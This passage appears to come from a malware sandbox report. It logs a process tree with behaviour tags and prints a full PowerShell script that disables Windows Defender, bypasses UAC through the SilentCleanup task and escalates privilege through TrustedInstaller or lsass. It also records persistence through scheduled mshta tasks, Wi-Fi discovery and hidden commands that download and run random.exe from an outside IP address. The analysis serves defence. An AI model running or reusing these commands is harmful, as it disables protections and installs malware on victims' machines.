     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 6⤵PID:9532
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend7⤵
- Launches sc.exe
PID:11724
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"7⤵PID:12328
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups7⤵PID:5312
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller7⤵PID:9608
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 6⤵PID:8340
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend7⤵
- Launches sc.exe
PID:12064
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"7⤵PID:12640
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups7⤵PID:1300
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller7⤵PID:6248
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All6⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:12468 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:11644
-
-
C:\Windows\system32\netsh.exenetsh wlan show profile7⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6460
-
-
C:\Windows\system32\findstr.exefindstr All7⤵PID:6368
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid6⤵PID:7336
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:7148
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid7⤵PID:3508
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10204850101\825c502f88.exe"C:\Users\Admin\AppData\Local\Temp\10204850101\825c502f88.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5844 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn F4Tnjmahens /tr "mshta C:\Users\Admin\AppData\Local\Temp\U9yJfTCKh.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:7568 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn F4Tnjmahens /tr "mshta C:\Users\Admin\AppData\Local\Temp\U9yJfTCKh.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:7892
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\U9yJfTCKh.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:8200 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BXNWDESJ5VTXLVQFEFF3OEYS5EC4EIYF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:9384 -
C:\Users\Admin\AppData\Local\TempBXNWDESJ5VTXLVQFEFF3OEYS5EC4EIYF.EXE"C:\Users\Admin\AppData\Local\TempBXNWDESJ5VTXLVQFEFF3OEYS5EC4EIYF.EXE"6⤵PID:6696
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10204860121\am_no.cmd" "3⤵PID:6496
-
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- Delays execution with timeout.exe
PID:11636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵PID:6568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
PID:11848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵PID:8844
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
PID:8928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵PID:7092
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6240
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "ptK1rma2LFk" /tr "mshta \"C:\Temp\SThQxk8Wa.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4376
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\SThQxk8Wa.hta"4⤵PID:10928
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Command and Scripting Interpreter: PowerShell
PID:9348 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵PID:10644
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10205310101\c4ad3e208a.exe"C:\Users\Admin\AppData\Local\Temp\10205310101\c4ad3e208a.exe"3⤵PID:12184
-
-
C:\Users\Admin\AppData\Local\Temp\10205320101\o8zlsgy.exe"C:\Users\Admin\AppData\Local\Temp\10205320101\o8zlsgy.exe"3⤵PID:7588
-
-
C:\Users\Admin\AppData\Local\Temp\10205340101\VpUdZiX.exe"C:\Users\Admin\AppData\Local\Temp\10205340101\VpUdZiX.exe"3⤵PID:12708
-
-
C:\Users\Admin\AppData\Local\Temp\10205360101\5984a6a111.exe"C:\Users\Admin\AppData\Local\Temp\10205360101\5984a6a111.exe"3⤵PID:9156
-
-
C:\Users\Admin\AppData\Local\Temp\10205370101\086e33edb9.exe"C:\Users\Admin\AppData\Local\Temp\10205370101\086e33edb9.exe"3⤵PID:9824
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1304 -ip 13041⤵PID:4500
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:9012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 9004 -ip 90041⤵PID:9084
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}1⤵
- Command and Scripting Interpreter: PowerShell
PID:8144 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend2⤵
- Launches sc.exe
PID:11512
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"2⤵PID:13080
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups2⤵PID:9420
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend2⤵PID:9760
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE2⤵
- Launches sc.exe
PID:10688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}1⤵
- Command and Scripting Interpreter: PowerShell
PID:9624 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend2⤵
- Launches sc.exe
PID:8208
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"2⤵PID:8588
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups2⤵PID:5980
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend2⤵PID:10972
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE2⤵
- Launches sc.exe
PID:11032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}1⤵
- Command and Scripting Interpreter: PowerShell
PID:10476 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend2⤵
- Launches sc.exe
PID:8160
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"2⤵PID:8452
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups2⤵PID:9228
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend2⤵PID:8988
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE2⤵
